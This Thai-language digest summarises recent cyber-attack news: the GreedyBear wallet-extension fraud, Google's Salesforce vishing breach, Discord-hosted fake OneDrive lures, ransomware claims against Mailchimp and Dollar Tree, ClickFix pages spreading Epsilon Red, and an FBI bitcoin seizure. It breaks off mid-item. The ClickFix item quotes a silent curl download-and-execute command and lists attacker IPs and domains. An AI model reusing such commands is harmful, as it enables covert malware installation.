🕵️‍♂️💰 เรื่องเล่าจากโลกไซเบอร์: GreedyBear กับแผนโจรกรรมคริปโตระดับอุตสาหกรรม ในโลกที่คริปโตกลายเป็นสินทรัพย์ยอดนิยม กลุ่มอาชญากรไซเบอร์ก็ไม่พลาดที่จะตามกระแส ล่าสุดมีการเปิดโปงแคมเปญชื่อว่า “GreedyBear” ซึ่งขโมยเงินคริปโตไปแล้วกว่า 1 ล้านดอลลาร์ โดยใช้วิธีโจมตีแบบสามชั้นที่ซับซ้อนและอันตราย กลุ่มนี้เริ่มจากการสร้างส่วนขยายปลอมใน Firefox Marketplace มากกว่า 150 รายการ โดยปลอมเป็นกระเป๋าคริปโตยอดนิยม เช่น MetaMask, TronLink, Exodus และ Rabby Wallet พวกเขาใช้เทคนิค “Extension Hollowing” คืออัปโหลดส่วนขยายที่ดูปลอดภัยก่อน แล้วค่อยเปลี่ยนชื่อ ไอคอน และฝังโค้ดอันตรายเข้าไปภายหลัง โดยยังคงรีวิวดี ๆ ไว้เหมือนเดิม นอกจากนั้น GreedyBear ยังปล่อยมัลแวร์กว่า 500 ตัวผ่านเว็บไซต์แจกโปรแกรมเถื่อน โดยมีทั้ง credential stealers และ ransomware ที่ล็อกไฟล์และเรียกค่าไถ่เป็นคริปโต และสุดท้ายคือการสร้างเว็บไซต์ปลอมที่ดูเหมือนบริการกระเป๋าคริปโตหรือเครื่องมือซ่อมกระเป๋า เพื่อหลอกให้ผู้ใช้กรอกข้อมูลสำคัญ ทั้งหมดนี้ถูกควบคุมผ่านเซิร์ฟเวอร์เดียว (IP: 185.208.156.66) ซึ่งทำให้การจัดการแคมเปญเป็นไปอย่างมีประสิทธิภาพ และยังมีหลักฐานว่าใช้โค้ดที่สร้างด้วย AI เพื่อเร่งการโจมตีและปรับเปลี่ยนรูปแบบได้อย่างรวดเร็ว ✅ GreedyBear เป็นแคมเปญอาชญากรรมไซเบอร์ที่ขโมยคริปโตไปแล้วกว่า $1 ล้าน ➡️ ใช้วิธีโจมตีหลายรูปแบบพร้อมกัน ✅ มีส่วนขยายปลอมใน Firefox Marketplace มากกว่า 150 รายการ ➡️ ปลอมเป็นกระเป๋าคริปโตยอดนิยม เช่น MetaMask, TronLink, Exodus ✅ ใช้เทคนิค Extension Hollowing เพื่อหลบการตรวจสอบ ➡️ อัปโหลดส่วนขยายปลอดภัยก่อน แล้วค่อยเปลี่ยนเป็นอันตราย ✅ ปล่อยมัลแวร์กว่า 500 ตัวผ่านเว็บไซต์แจกโปรแกรมเถื่อน ➡️ มีทั้ง LummaStealer และ Luca Stealer ที่เน้นขโมยข้อมูลคริปโต ✅ สร้างเว็บไซต์ปลอมที่ดูเหมือนบริการกระเป๋าคริปโตหรือซ่อมกระเป๋า ➡️ หลอกให้ผู้ใช้กรอก seed phrase และ private key ✅ ทุกการโจมตีเชื่อมโยงกับเซิร์ฟเวอร์เดียว (185.208.156.66) ➡️ ใช้เป็นศูนย์กลางควบคุมและเก็บข้อมูล ✅ มีการใช้โค้ดที่สร้างด้วย AI เพื่อเร่งการโจมตี ➡️ ทำให้ปรับเปลี่ยนรูปแบบได้รวดเร็วและหลบหลีกการป้องกัน ✅ Extension Hollowing เป็นเทคนิคที่เริ่มใช้ในมัลแวร์ระดับองค์กร ➡️ เคยพบในแคมเปญโจมตีของกลุ่ม APT เช่น Lazarus ✅ Mozilla มีระบบตรวจสอบส่วนขยาย แต่ยังไม่สามารถกันการเปลี่ยนแปลงภายหลังได้ ➡️ ผู้ใช้ต้องตรวจสอบผู้พัฒนาและรีวิวอย่างละเอียด ✅ การใช้ AI ในการสร้างมัลแวร์เริ่มแพร่หลายมากขึ้น ➡️ ทำให้การตรวจจับด้วย signature-based antivirus ไม่เพียงพอ ✅ การโจมตีแบบหลายชั้น (multi-vector attack) เป็นแนวโน้มใหม่ของอาชญากรรมไซเบอร์ ➡️ เน้นการหลอกลวงจากหลายช่องทางพร้อมกันเพื่อเพิ่มโอกาสสำเร็จ https://hackread.com/greedybear-fake-crypto-wallet-extensions-firefox-marketplace/

📞🕵️‍♂️ เรื่องเล่าจากโลกไซเบอร์: เมื่อ Google ถูกหลอกด้วยเสียง และข้อมูลลูกค้าก็หลุดไป ในเดือนมิถุนายน 2025 Google ได้ยืนยันว่าเกิดเหตุข้อมูลรั่วไหลจากระบบ Salesforce ภายในของบริษัท ซึ่งใช้เก็บข้อมูลลูกค้าธุรกิจขนาดกลางและขนาดเล็ก โดยกลุ่มแฮกเกอร์ชื่อดัง ShinyHunters (หรือ UNC6040) ใช้เทคนิค “vishing” หรือการหลอกลวงผ่านเสียงโทรศัพท์ เพื่อหลอกพนักงานให้อนุมัติแอปปลอมที่แฝงตัวเป็นเครื่องมือ Salesforce Data Loader เมื่อได้รับสิทธิ์เข้าถึงแล้ว แฮกเกอร์สามารถดูดข้อมูลออกจากระบบได้ในช่วงเวลาสั้น ๆ ก่อนที่ Google จะตรวจพบและตัดการเข้าถึง โดยข้อมูลที่ถูกขโมยนั้นเป็นข้อมูลพื้นฐาน เช่น ชื่อบริษัท เบอร์โทร และโน้ตประกอบ ซึ่ง Google ระบุว่าเป็นข้อมูลที่ “ส่วนใหญ่เปิดเผยอยู่แล้ว” อย่างไรก็ตาม เหตุการณ์นี้สะท้อนถึงความเปราะบางของระบบที่พึ่งพามนุษย์เป็นด่านแรก และเป็นส่วนหนึ่งของแคมเปญโจมตีที่กว้างขึ้น ซึ่งมีเป้าหมายเป็นบริษัทที่ใช้ Salesforce เช่น Chanel, Dior, Pandora, Qantas และ Allianz โดยกลุ่ม UNC6240 ซึ่งเชื่อว่าเป็นแขนงของ ShinyHunters จะตามมาด้วยการขู่เรียกค่าไถ่ภายใน 72 ชั่วโมง พร้อมขู่ว่าจะเปิดเผยข้อมูลผ่านเว็บไซต์ “Data Leak Site” ✅ Google ยืนยันว่าระบบ Salesforce ภายในถูกเจาะข้อมูล ➡️ เกิดขึ้นในเดือนมิถุนายน 2025 โดยกลุ่ม UNC6040 ✅ ข้อมูลที่ถูกขโมยเป็นข้อมูลพื้นฐานของลูกค้าธุรกิจ SMB ➡️ เช่น ชื่อบริษัท เบอร์โทร และโน้ตประกอบ ✅ แฮกเกอร์ใช้เทคนิค vishing หลอกพนักงานผ่านโทรศัพท์ ➡️ โดยปลอมตัวเป็นฝ่าย IT และให้ติดตั้งแอปปลอม ✅ แอปปลอมถูกระบุว่าเป็น Salesforce Data Loader หรือชื่อหลอกเช่น “My Ticket Portal” ➡️ ใช้ OAuth เพื่อเข้าถึงข้อมูลโดยไม่ถูกตรวจจับ ✅ Google ตัดการเข้าถึงได้ภายใน “ช่วงเวลาสั้น ๆ” ➡️ และแจ้งลูกค้าที่ได้รับผลกระทบทันที ✅ กลุ่ม UNC6240 ตามมาด้วยการขู่เรียกค่าไถ่ ➡️ โดยส่งอีเมลหรือโทรศัพท์เรียกเงินในรูปแบบ Bitcoin ภายใน 72 ชั่วโมง ✅ ShinyHunters เคยโจมตี Snowflake, AT&T, PowerSchool และ Oracle Cloud ➡️ เป็นกลุ่มที่มีประวัติการเจาะระบบระดับสูง ✅ Salesforce ยืนยันว่าแพลตฟอร์มไม่มีช่องโหว่ ➡️ ปัญหาเกิดจากการหลอกลวงผู้ใช้ ไม่ใช่ระบบ ✅ การเชื่อมต่อแอปภายนอกใน Salesforce ใช้รหัส 8 หลัก ➡️ เป็นช่องทางที่แฮกเกอร์ใช้หลอกให้เชื่อมต่อกับแอปปลอม ✅ บริษัทที่ตกเป็นเหยื่อมีทั้งแบรนด์หรูและสายการบิน ➡️ เช่น Chanel, Dior, Louis Vuitton, Qantas และ Allianz ✅ Google แนะนำให้ใช้ MFA, จำกัดสิทธิ์ และฝึกอบรมพนักงาน ➡️ เพื่อป้องกันการโจมตีแบบ social engineering https://hackread.com/google-salesforce-data-breach-shinyhunters-vishing-scam/

🕵️‍♂️📎 เรื่องเล่าจากโลกไซเบอร์: เมื่อ Discord กลายเป็นประตูหลังให้แฮกเกอร์ผ่าน OneDrive ปลอม ในยุคที่ทุกคนคุ้นเคยกับการแชร์ไฟล์ผ่าน OneDrive และใช้ Discord เป็นช่องทางสื่อสารหลัก แฮกเกอร์ก็ใช้ความคุ้นเคยนี้เป็นเครื่องมือโจมตีแบบแนบเนียน ล่าสุด Sublime Security พบแคมเปญฟิชชิ่งที่ใช้ลิงก์จาก Discord CDN ปลอมตัวเป็นไฟล์จาก OneDrive เพื่อหลอกให้เหยื่อดาวน์โหลดมัลแวร์ แฮกเกอร์ส่งอีเมลจากบัญชีที่ถูกเจาะแล้ว โดยปลอมเป็นข้อความแจ้งเตือนจาก OneDrive พร้อมไอคอน Word และ footer ที่ดูเหมือนของจริง แต่ลิงก์ในอีเมลนั้นไม่ได้พาไปโหลดไฟล์ .docx อย่างที่อ้าง กลับเป็นไฟล์ .msi ที่ซ่อนมัลแวร์ไว้ เมื่อเหยื่อคลิกและติดตั้งไฟล์นั้น จะมีโปรแกรมควบคุมระยะไกล (RMM) สองตัวถูกติดตั้งพร้อมกัน ได้แก่ Atera ที่ติดตั้งแบบเห็นได้ชัด และ Splashtop Streamer ที่ทำงานเงียบ ๆ เบื้องหลัง พร้อมกับ .NET Runtime 8 ทั้งหมดนี้ถูกโหลดจากแหล่งที่ดูน่าเชื่อถือ ทำให้ยากต่อการตรวจจับ การใช้ RMM แบบหลายตัวช่วยให้แฮกเกอร์รักษาการควบคุมเครื่องแม้จะมีการตรวจพบบางส่วน และสามารถใช้เครื่องเหยื่อในการขโมยข้อมูล เรียกค่าไถ่ หรือเป็นฐานส่งมัลแวร์ต่อไป นอกจากนี้ยังมีแคมเปญอื่นที่ใช้ Discord CDN เพื่อส่งไฟล์ลัดที่เรียก PowerShell ดาวน์โหลดมัลแวร์จากลิงก์ที่ถูกดัดแปลงให้หลบการตรวจจับได้ ทำให้ Discord ซึ่งเป็นแพลตฟอร์มที่เชื่อถือได้ กลายเป็นช่องทางโจมตีที่อันตรายอย่างคาดไม่ถึง ✅ พบแคมเปญฟิชชิ่งปลอมเป็น OneDrive โดยใช้ Discord CDN เป็นที่เก็บไฟล์ ➡️ อีเมลปลอมมีไอคอน Word และ footer ที่ดูเหมือนของจริง ✅ ไฟล์ที่โหลดเป็น .msi แทนที่จะเป็น .docx ตามที่อ้าง ➡️ ใช้เทคนิค file extension manipulation เพื่อหลอกเหยื่อ ✅ ติดตั้ง RMM สองตัวคือ Atera และ Splashtop Streamer ➡️ Atera ติดตั้งแบบเห็นได้ชัด ส่วน Splashtop ทำงานเงียบ ๆ ✅ ใช้ .NET Runtime 8 เพื่อเสริมการทำงานของมัลแวร์ ➡️ ทั้งหมดโหลดจากแหล่งที่ดูปลอดภัย ทำให้ตรวจจับยาก ✅ Sublime Security ตรวจพบด้วยระบบ AI ที่วิเคราะห์พฤติกรรมอีเมล ➡️ เช่น การส่งถึงผู้รับไม่เปิดเผย และการใช้ลิงก์จาก Discord CDN ✅ Discord CDN ถูกใช้ในหลายแคมเปญมัลแวร์ช่วงปี 2024–2025 ➡️ เช่นการฝัง PowerShell shortcut ในไฟล์ zip เพื่อโหลดมัลแวร์ ✅ แฮกเกอร์ใช้เทคนิค URL obfuscation เพื่อหลบการตรวจจับ ➡️ เช่นการแทนที่บางส่วนของลิงก์เพื่อให้ระบบความปลอดภัยมองข้าม ✅ RMM เป็นเครื่องมือที่ถูกต้องตามกฎหมายแต่ถูกนำไปใช้ในทางร้าย ➡️ ใช้ควบคุมเครื่องเหยื่อจากระยะไกลโดยไม่ต้องใช้ backdoor ✅ การโจมตีแบบ multi-stage ช่วยให้แฮกเกอร์รักษาการควบคุมได้ยาวนาน ➡️ แม้จะมีการลบโปรแกรมบางตัว ก็ยังมีอีกตัวทำงานอยู่ https://hackread.com/discord-cdn-link-deliver-rat-disguised-onedrive-file/

🎙️ เรื่องเล่าจากข่าว: Everest Ransomware กับการโจมตี Mailchimp ที่กลายเป็นเรื่องตลกในวงการไซเบอร์ ปลายเดือนกรกฎาคม 2025 กลุ่ม Everest ransomware ได้โพสต์บนเว็บไซต์มืดว่า พวกเขาเจาะระบบของ Mailchimp—แพลตฟอร์มการตลาดผ่านอีเมลชื่อดัง—และขโมยข้อมูลขนาด 767 MB รวม 943,536 บรรทัด ซึ่งอ้างว่าเป็น “เอกสารภายในบริษัท” และ “ข้อมูลส่วนตัวของลูกค้า” แต่เมื่อผู้เชี่ยวชาญด้านความปลอดภัยได้ตรวจสอบตัวอย่างข้อมูล พบว่าเป็นเพียงข้อมูลธุรกิจทั่วไป เช่น อีเมลบริษัท, โดเมน, เบอร์โทร, เมือง, ประเทศ, ลิงก์โซเชียลมีเดีย และเทคโนโลยีที่ใช้ ไม่ใช่ข้อมูลลับหรือข้อมูลภายในที่สำคัญของ Mailchimp ชุมชนไซเบอร์จึงพากันหัวเราะเยาะการโจมตีครั้งนี้ โดยเปรียบเทียบว่า “เหมือนข้อมูลของลูกค้าคนเดียว” หรือ “แค่เศษเสี้ยวของข้อมูลที่ Mailchimp ส่งออกในหนึ่งวินาที” แม้จะดูเล็กน้อย แต่การโจมตีนี้ยังสะท้อนแนวโน้มที่น่ากังวล—การเพิ่มขึ้นของ ransomware ทั่วโลกในเดือนกรกฎาคม โดยมีหลายกลุ่มโจมตีองค์กรใหญ่ เช่น Dollar Tree, Albavision และ NASCAR ✅ Everest ransomware อ้างว่าเจาะระบบ Mailchimp และขโมยข้อมูล 767 MB รวม 943,536 บรรทัด ➡️ อ้างว่าเป็นเอกสารภายในและข้อมูลลูกค้า ➡️ โพสต์บนเว็บไซต์มืดพร้อมตัวอย่างข้อมูล ✅ ข้อมูลที่หลุดเป็นข้อมูลธุรกิจทั่วไป ไม่ใช่ข้อมูลลับของ Mailchimp ➡️ เช่น อีเมลบริษัท, โดเมน, เบอร์โทร, เทคโนโลยีที่ใช้ ➡️ ดูเหมือนมาจากการ export จากระบบ CRM มากกว่าระบบภายใน ✅ ชุมชนผู้เชี่ยวชาญด้านไซเบอร์เยาะเย้ยการโจมตีครั้งนี้ว่า “เล็กเกินคาด” ➡️ เปรียบเทียบว่าเป็นข้อมูลของลูกค้าคนเดียว ➡️ คาดหวังว่าจะมีข้อมูลระดับ GB หรือ TB จากบริษัทใหญ่แบบ Mailchimp ✅ Everest ransomware เคยโจมตีบริษัทใหญ่มาแล้ว เช่น Coca-Cola และรัฐบาลในอเมริกาใต้ ➡️ ใช้โมเดล double extortion: เข้ารหัสไฟล์ + ขู่เปิดเผยข้อมูล ➡️ ล่าสุดเริ่มขายสิทธิ์เข้าถึงระบบให้กลุ่มอื่นแทนการโจมตีเอง ✅ การโจมตี Mailchimp เป็นส่วนหนึ่งของคลื่น ransomware ที่พุ่งสูงในเดือนกรกฎาคม 2025 ➡️ INC ransomware อ้างว่าได้ข้อมูล 1.2 TB จาก Dollar Tree ➡️ GLOBAL GROUP โจมตี Albavision ได้ข้อมูล 400 GB ➡️ Medusa ransomware เรียกค่าไถ่ NASCAR มูลค่า $4 ล้าน https://hackread.com/everest-ransomware-claims-mailchimp-small-breach/

🎙️ เรื่องเล่าจากข่าว: Dollar Tree ปฏิเสธการถูกแฮก—แต่ข้อมูลที่หลุดอาจมาจากอดีตคู่แข่งที่ล้มละลาย INC Ransom ซึ่งเป็นกลุ่มแรนซัมแวร์ที่มีประวัติการโจมตีองค์กรทั่วโลก ได้โพสต์ชื่อ Dollar Tree บนเว็บไซต์ของตน พร้อมอ้างว่าได้ขโมยข้อมูลกว่า 1.2TB ซึ่งรวมถึงเอกสารสำคัญและข้อมูลส่วนบุคคล เช่น สแกนหนังสือเดินทาง และขู่ว่าจะเปิดเผยหากไม่จ่ายค่าไถ่ แต่ Dollar Tree ออกแถลงการณ์ปฏิเสธทันที โดยระบุว่า “ข้อมูลที่หลุดนั้นเป็นของ 99 Cents Only” ซึ่งเป็นบริษัทคู่แข่งที่ล้มละลายไปในปี 2024 และ Dollar Tree ได้ซื้อสิทธิ์การเช่าอาคารบางแห่งมาเปิดร้านใหม่เท่านั้น ไม่ได้ซื้อระบบหรือฐานข้อมูลของบริษัทนั้นแต่อย่างใด 99 Cents Only ปิดกิจการทั้งหมด 371 สาขา และไม่มีช่องทางติดต่อแล้ว ทำให้ไม่สามารถยืนยันข้อมูลจากฝั่งนั้นได้ ขณะที่ Dollar Tree ยืนยันว่า “ไม่มีการเจาะระบบของเรา” และ “ไม่มีการซื้อข้อมูลหรือระบบจาก 99 Cents Only” ✅ INC Ransom อ้างว่าเจาะระบบ Dollar Tree และขโมยข้อมูล 1.2TB ➡️ รวมถึงข้อมูลส่วนบุคคล เช่น สแกนหนังสือเดินทาง ➡️ ขู่ว่าจะเปิดเผยข้อมูลหากไม่จ่ายค่าไถ่ ✅ Dollar Tree ปฏิเสธการถูกแฮก และระบุว่าข้อมูลนั้นเป็นของ 99 Cents Only ➡️ บริษัทคู่แข่งที่ล้มละลายไปในปี 2024 ➡️ Dollar Tree ซื้อแค่สิทธิ์การเช่าอาคาร ไม่ได้ซื้อระบบหรือข้อมูล ✅ 99 Cents Only ปิดกิจการทั้งหมด 371 สาขา และไม่มีช่องทางติดต่อแล้ว ➡️ Dollar Tree เปิดร้านใหม่ในอาคารเดิม 170 แห่ง ➡️ ไม่มีการรวมระบบหรือฐานข้อมูลของบริษัทเดิม ✅ Dollar Tree เป็นบริษัทค้าปลีกขนาดใหญ่ มีรายได้กว่า $17.6 พันล้านในปี 2024 ➡️ มีสาขากว่า 15,000 แห่งในสหรัฐฯ และแคนาดา ➡️ มีพนักงานมากกว่า 65,000 คน ✅ INC Ransom เป็นกลุ่มแรนซัมแวร์แบบ multi-extortion ที่โจมตีองค์กรทั่วโลก ➡️ เคยโจมตีองค์กรในภาครัฐ การศึกษา และสุขภาพ ➡️ ใช้เทคนิคขู่เปิดเผยข้อมูลเพื่อเรียกค่าไถ่ ✅ 99 Cents Only ยื่นล้มละลายในเดือนเมษายน 2024 จากผลกระทบของเงินเฟ้อ โควิด และการแข่งขันที่รุนแรง ➡️ ปิดกิจการทั้งหมดภายในกลางปี 2024 ➡️ เป็นหนึ่งในบริษัทค้าปลีกที่ล้มละลายจากภาวะเศรษฐกิจ ✅ INC Ransom เคยโจมตีองค์กรระดับสูง เช่น Stark AeroSpace และ Xerox Corporation ➡️ ไม่เลือกเป้าหมายเฉพาะเจาะจง ➡️ มีเหยื่อมากกว่า 200 รายในช่วง 12 เดือนที่ผ่านมา ✅ การโจมตีแบบ multi-extortion คือการขโมยข้อมูล + ขู่เปิดเผย + เรียกค่าไถ่ ➡️ เป็นรูปแบบที่เพิ่มแรงกดดันให้เหยื่อยอมจ่าย ➡️ ต้องมีระบบป้องกันและแผนตอบสนองที่ชัดเจน ✅ การซื้อกิจการหรือทรัพย์สินจากบริษัทที่ล้มละลายต้องมีการตรวจสอบความปลอดภัยของข้อมูลอย่างเข้มงวด ➡️ ไม่ใช่แค่ตรวจสอบทรัพย์สินทางกายภาพ แต่ต้องรวมถึงระบบดิจิทัล ➡️ ควรมีการล้างข้อมูลและ audit ก่อนนำมาใช้งาน ‼️ แม้ Dollar Tree จะไม่ถูกเจาะโดยตรง แต่ข้อมูลจาก 99 Cents Only อาจมีความเกี่ยวข้องกับลูกค้าเดิมหรือพนักงานที่ยังมีผลกระทบ ⛔ หากข้อมูลนั้นยังมีความเชื่อมโยงกับระบบที่ Dollar Tree ใช้ อาจเกิดความเสี่ยง ⛔ ต้องตรวจสอบว่าไม่มีการนำข้อมูลเดิมมาใช้ซ้ำในระบบใหม่ ‼️ การซื้อสิทธิ์เช่าอาคารโดยไม่ซื้อระบบ ไม่ได้หมายความว่าข้อมูลจะปลอดภัยเสมอไป ⛔ หากมีการโอนอุปกรณ์หรือเซิร์ฟเวอร์โดยไม่ได้ล้างข้อมูล อาจเกิดการรั่วไหล ⛔ ต้องมีการตรวจสอบทรัพย์สินดิจิทัลอย่างละเอียดก่อนนำมาใช้งาน ‼️ การปฏิเสธการถูกแฮกอาจไม่เพียงพอ หากไม่มีการตรวจสอบระบบอย่างโปร่งใส ⛔ ควรมีการเปิดเผยผลการตรวจสอบจากผู้เชี่ยวชาญภายนอก ⛔ เพื่อสร้างความเชื่อมั่นให้กับลูกค้าและพันธมิตร ‼️ การโจมตีแบบ multi-extortion ของ INC Ransom อาจยังดำเนินต่อไป แม้บริษัทจะไม่จ่ายค่าไถ่ ⛔ ข้อมูลอาจถูกเปิดเผยในอนาคตเพื่อกดดันเพิ่มเติม ⛔ ต้องเตรียมแผนรับมือด้านสื่อและกฎหมายล่วงหน้า https://www.techradar.com/pro/security/dollar-tree-denies-data-breach-says-hacker-targeted-its-rival-instead

🧠 เรื่องเล่าจากข่าว: “Mailchimp โดนเจาะ” กับเบื้องหลังของ Everest ที่ไม่ธรรมดา Everest ransomware เป็นกลุ่มแฮกเกอร์ที่ใช้โมเดล “double extortion” คือเข้ารหัสไฟล์ของเหยื่อ และขโมยข้อมูลไปเผยแพร่เพื่อกดดันให้จ่ายค่าไถ่ ล่าสุดพวกเขาอ้างว่าได้เจาะระบบของ Mailchimp—แพลตฟอร์มการตลาดผ่านอีเมลที่มีผู้ใช้กว่า 14 ล้านรายทั่วโลก ข้อมูลที่ถูกขโมยมีขนาด 767 MB รวมกว่า 943,536 บรรทัด ซึ่งดูเหมือนจะเป็นข้อมูลจากระบบ CRM หรือการส่งออกจากฐานข้อมูลลูกค้า มากกว่าจะเป็นข้อมูลภายในของ Mailchimp เอง เช่น ชื่อบริษัท, อีเมล, เบอร์โทร, โดเมน, เทคโนโลยีที่ใช้ (Shopify, WordPress, Google Cloud ฯลฯ) แม้จะไม่ใช่การเจาะระบบหลัก แต่การโจมตีนี้เกิดขึ้นในช่วงที่แรนซัมแวร์กำลังระบาดหนัก—ในเวลาใกล้กัน INC Ransom อ้างว่าได้ข้อมูล 1.2 TB จาก Dollar Tree และ GLOBAL GROUP อ้างว่าเจาะ Albavisión ได้ 400 GB ส่วน Medusa ก็เรียกค่าไถ่ NASCAR ถึง $4 ล้าน ✅ Everest ransomware อ้างว่าเจาะระบบ Mailchimp และขโมยข้อมูล 943,536 รายการ ➡️ ขนาดไฟล์รวม 767 MB ถูกเผยแพร่บน dark web ➡️ ข้อมูลดูเหมือนมาจากระบบ CRM ไม่ใช่ระบบภายในของ Mailchimp ✅ ข้อมูลที่รั่วไหลประกอบด้วยข้อมูลธุรกิจ เช่น โดเมน, อีเมล, เบอร์โทร, เทคโนโลยีที่ใช้ ➡️ มีข้อมูลเกี่ยวกับ GDPR, โซเชียลมีเดีย, และผู้ให้บริการ hosting ➡️ จัดเรียงแบบ spreadsheet แสดงว่าอาจมาจากการส่งออกข้อมูลลูกค้า ✅ Everest ใช้โมเดล double extortion—เข้ารหัสไฟล์และขู่เปิดเผยข้อมูล ➡️ เคยโจมตี Coca-Cola ในเดือนพฤษภาคม 2025 และเผยแพร่ข้อมูลพนักงาน ➡️ ใช้ dark web leak site เป็นเครื่องมือกดดันเหยื่อ ✅ Mailchimp เป็นบริษัทใหญ่ที่มีผู้ใช้กว่า 14 ล้านราย และถูก Intuit ซื้อกิจการในปี 2021 ➡️ มีรายได้ปีละ $61 พันล้าน และถือครองตลาดอีเมลถึง 2 ใน 3 ➡️ การโจมตีแม้จะเล็ก แต่กระทบต่อภาพลักษณ์และความเชื่อมั่น ✅ ในเดือนกรกฎาคม 2025 มีการโจมตีหลายกรณีที่น่าจับตา ➡️ INC Ransom อ้างว่าได้ข้อมูล 1.2 TB จาก Dollar Tree ➡️ GLOBAL GROUP เจาะ Albavisión ได้ 400 GB ➡️ Medusa เรียกค่าไถ่ NASCAR $4 ล้าน พร้อมขู่เปิดเผยข้อมูล https://hackread.com/everest-ransomware-claims-mailchimp-small-breach/

🧠 เรื่องเล่าจากข่าว: “ClickFix” กับกับดักปลอมที่เปิดทางให้ Epsilon Red เข้าระบบคุณ ตั้งแต่เดือนกรกฎาคม 2025 แฮกเกอร์เริ่มใช้หน้าเว็บปลอมที่ดูเหมือนระบบยืนยันตัวตนจากแพลตฟอร์มดัง เช่น Discord, Twitch, Kick และ OnlyFans โดยอ้างว่าเป็น “ClickFix verification” เพื่อหลอกให้ผู้ใช้ดาวน์โหลดไฟล์ .HTA ซึ่งเป็นไฟล์ HTML ที่สามารถรันสคริปต์ได้ใน Windows เมื่อผู้ใช้คลิก “ยืนยันตัวตน” หน้าเว็บจะเปิดอีกหน้าที่แอบรันคำสั่งผ่าน ActiveXObject เช่น WScript.Shell เพื่อดาวน์โหลดไฟล์ ransomware จากเซิร์ฟเวอร์ของแฮกเกอร์ แล้วรันแบบเงียบ ๆ โดยไม่แสดงหน้าต่างใด ๆ เทคนิคนี้ต่างจากเวอร์ชันเก่าที่ใช้การคัดลอกคำสั่งไปยัง clipboard—เพราะเวอร์ชันใหม่นี้รันคำสั่งโดยตรงผ่านเบราว์เซอร์ ทำให้หลบเลี่ยงระบบป้องกันได้ง่ายขึ้น Epsilon Red ransomware จะเข้ารหัสไฟล์ทั้งหมดในเครื่อง และทิ้งข้อความเรียกค่าไถ่ที่มีสไตล์คล้าย REvil แต่มีการปรับปรุงด้านไวยากรณ์เล็กน้อย ✅ Epsilon Red ransomware ถูกแพร่ผ่านไฟล์ .HTA ที่แฝงอยู่ในหน้าเว็บปลอมชื่อ “ClickFix” ➡️ หน้าเว็บปลอมอ้างว่าเป็นระบบยืนยันตัวตนจาก Discord, Twitch, Kick, OnlyFans ➡️ หลอกให้ผู้ใช้คลิกและรันไฟล์ .HTA ที่มีสคริปต์อันตราย ✅ ไฟล์ .HTA ใช้ ActiveXObject เพื่อรันคำสั่งผ่าน Windows Script Host (WSH) ➡️ เช่น shell.Run("cmd /c curl -s -o a.exe ... && a.exe", 0) ➡️ ดาวน์โหลดไฟล์ ransomware และรันแบบเงียบโดยไม่เปิดหน้าต่าง ✅ แฮกเกอร์ใช้เทคนิค social engineering เช่นข้อความยืนยันปลอมเพื่อหลอกผู้ใช้ ➡️ เช่น “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” พร้อม typo จงใจให้ดูไม่อันตราย ➡️ ใช้คำสั่ง pause เพื่อให้หน้าต่างค้างไว้ดูเหมือนระบบจริง ✅ Epsilon Red ransomware เข้ารหัสไฟล์ทั้งหมดในเครื่องและทิ้งข้อความเรียกค่าไถ่ ➡️ มีลักษณะคล้าย REvil แต่ไม่มีความเกี่ยวข้องโดยตรง ➡️ ใช้ PowerShell scripts หลายตัวเพื่อเตรียมระบบก่อนเข้ารหัส ✅ โครงสร้างแคมเปญมีการปลอมตัวเป็นบริการยอดนิยมและใช้ IP/โดเมนเฉพาะในการโจมตี ➡️ เช่น twtich[.]cc, capchabot[.]cc และ IP 155.94.155.227:2269 ➡️ มีการใช้ Quasar RAT ร่วมด้วยในบางกรณี ‼️ ผู้ใช้ที่เปิดไฟล์ .HTA หรือใช้ Internet Explorer มีความเสี่ยงสูงมาก ⛔ ActiveX ยังเปิดใช้งานในบางระบบ Windows โดยไม่รู้ตัว ⛔ การรันคำสั่งผ่านเบราว์เซอร์สามารถหลบเลี่ยง SmartScreen และระบบป้องกันทั่วไป ‼️ องค์กรที่อนุญาตให้ใช้ปลั๊กอินเบราว์เซอร์หรือไม่จำกัดการเข้าถึงเว็บมีความเสี่ยงสูง ⛔ ผู้ใช้สามารถเข้าถึงหน้า ClickFix ปลอมและรันไฟล์ได้โดยไม่รู้ตัว ⛔ Endpoint อาจถูกเข้ารหัสและเรียกค่าไถ่ทันที ‼️ การใช้ social engineering แบบปลอมตัวเป็นบริการยอดนิยมทำให้ผู้ใช้ตกหลุมพรางง่ายขึ้น ⛔ ผู้ใช้เชื่อว่าเป็นการยืนยันตัวตนจริงจาก Discord หรือ Twitch ⛔ ไม่สงสัยว่าเป็นการโจมตีเพราะหน้าตาเว็บดูน่าเชื่อถือ ‼️ ระบบป้องกันแบบเดิมไม่สามารถตรวจจับการรันคำสั่งผ่าน ActiveX ได้ทันเวลา ⛔ การรันแบบเงียบไม่แสดงหน้าต่างหรือแจ้งเตือน ⛔ ไฟล์ถูกดาวน์โหลดและรันในหน่วยความจำโดยไม่มีร่องรอย https://hackread.com/onlyfans-discord-clickfix-pages-epsilon-red-ransomware/

🎙️ เรื่องเล่าจากโลกไซเบอร์: เมื่อ FBI ปิดบัญชี Chaos ด้วย Bitcoin ในเดือนเมษายน 2025 FBI Dallas ได้ยึด Bitcoin จำนวน 20.2891382 BTC จากกระเป๋าเงินดิจิทัลของสมาชิกกลุ่ม Chaos ransomware ที่ใช้ชื่อว่า “Hors” ซึ่งเชื่อมโยงกับการโจมตีไซเบอร์และเรียกค่าไถ่จากเหยื่อในรัฐเท็กซัสและพื้นที่อื่น ๆ Chaos เป็นกลุ่มแรนซัมแวร์แบบ RaaS (Ransomware-as-a-Service) ที่เพิ่งเกิดขึ้นในเดือนกุมภาพันธ์ 2025 โดยเชื่อว่าเป็นการรวมตัวของอดีตสมาชิกกลุ่ม BlackSuit ซึ่งถูกปราบปรามโดยปฏิบัติการระหว่างประเทศชื่อ “Operation Checkmate” กลุ่ม Chaos ใช้เทคนิคการโจมตีแบบ double extortion คือการเข้ารหัสไฟล์ของเหยื่อและขโมยข้อมูลเพื่อข่มขู่เปิดเผยหากไม่จ่ายค่าไถ่ โดยเรียกเงินสูงถึง $300,000 ต่อราย และใช้วิธีหลอกลวงผ่านโทรศัพท์ให้เหยื่อเปิด Microsoft Quick Assist เพื่อให้แฮกเกอร์เข้าถึงระบบ ✅ FBI Dallas ยึด Bitcoin มูลค่ากว่า $2.4 ล้านจากสมาชิกกลุ่ม Chaos ➡️ ยึดจากกระเป๋าเงินดิจิทัลของ “Hors” ผู้ต้องสงสัยโจมตีไซเบอร์ในเท็กซัส ➡️ 